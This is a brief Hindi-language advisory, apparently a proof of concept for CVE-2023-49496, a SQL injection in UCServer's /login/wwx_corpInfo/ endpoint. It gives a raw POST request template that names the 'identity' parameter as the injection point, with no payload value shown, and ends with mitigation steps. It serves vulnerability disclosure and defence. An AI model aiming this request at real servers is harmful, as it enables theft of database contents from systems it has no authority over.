
CVE-2023-49496 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो UCServer में /login/wwx_corpInfo/ एंडपॉइंट के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है और संवेदनशील डेटाबेस जानकारी निकालता है।
UCServer एक उन्नत एकीकृत संचार सर्वर है। शंघाई शुपिन सूचना प्रौद्योगिकी कंपनी लिमिटेड के UCServer में SQL इंजेक्शन भेद्यता मौजूद है, जिसका उपयोग करके हमलावर डेटाबेस की संवेदनशील जानकारी प्राप्त कर सकता है।
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive
&identity=
POST अनुरोध बॉडी में "identity" इंजेक्शन बिंदु है

वेबसाइट फ़ायरवॉल चालू करें; किसी भी IP को "/login/wwx_corpInfo/" पथ तक पहुँचने से रोकें; डेटाबेस को बाहरी दूरस्थ कनेक्शन स्वीकार करने से रोकें; डेटाबेस संस्करण को अपग्रेड करें।